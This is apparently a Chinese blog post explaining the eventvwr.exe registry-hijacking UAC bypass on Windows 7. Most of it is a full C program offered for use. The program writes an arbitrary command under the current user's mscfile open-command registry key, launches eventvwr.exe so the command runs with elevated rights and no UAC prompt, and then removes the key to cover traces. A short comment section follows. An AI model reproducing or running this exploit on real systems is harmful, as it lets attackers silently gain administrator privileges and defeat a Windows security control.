UAC Bypass use eventvwr.exe

又一个bypass UAC的法子,测试通过win7 UAC默认

原文在:https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

简单说一下就是eventvwr.exe在启动的时候会去检查注册表的command,恰好current_user 也在其中,

只是这个项目没有创建,当前用户可以通过在 HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command添加命令在用eventvwr.exe去执行就OK了,eventvwr.exe默认是过了UAC的,所以你被执行的命令也是过UAC

作者给的是powershell的poc,我也搞了个exe的,直接上代码。


#include <stdio.h>
#include <Windows.h>

void help()
{
	printf("Use: xx.exe [cmd]");
}

int main(int argc, char * argv[])
{


	if (argc != 2)
	{
		help();
		exit(0);
	}

	char *cmd = argv[1];
	if (strlen(cmd) > MAX_PATH)
	{
		printf("[-]: command too long!\n");
		exit(0);
	}

	// Reg key: HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
	// run pro: eventvwr
	char *regpath = "Software\\Classes\\mscfile\\shell\\open\\command";

	HKEY Kroot;
	DWORD dwdis;
	DWORD dwtype, dwsize;
	char regsize[2048];

	if ((RegCreateKeyEx(HKEY_CURRENT_USER, regpath, 0, NULL, 0, KEY_ALL_ACCESS, NULL, & Kroot, & dwdis)) != ERROR_SUCCESS)
	{
		printf("open reg error!\n");
		return -1;
	}
	if ((RegQueryValueEx(Kroot, NULL, NULL, & dwtype, (LPBYTE)regsize, & dwsize)) == ERROR_SUCCESS)
	{
		RegDeleteKey(HKEY_CURRENT_USER, regpath);
		if ((RegCreateKeyEx(HKEY_CURRENT_USER, regpath, 0, NULL, 0, KEY_ALL_ACCESS, NULL, & Kroot, & dwdis)) != ERROR_SUCCESS)
		{
			printf("create reg error!\n");
			return -1;
		}
	}


	char syspath[MAX_PATH];
	char command[MAX_PATH];
	memset(command, 0, MAX_PATH);
	memset(syspath, 0, MAX_PATH);
	GetSystemDirectory(syspath, MAX_PATH);
	sprintf_s(command, MAX_PATH, "%s\\cmd.exe /c %s", syspath, cmd);

	// set command
	RegSetValueEx(Kroot, NULL, 0, REG_SZ, (BYTE *)command, sizeof(command));

	// run it
	system("eventvwr.exe");

	//del
	RegDeleteKey(HKEY_CURRENT_USER, regpath);


	RegCloseKey(Kroot);
}

2 条评论

发表评论

*

  • Firefox 50.0 Firefox 50.0 Windows 7 x64 Edition Windows 7 x64 Edition
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

    来访,留个爪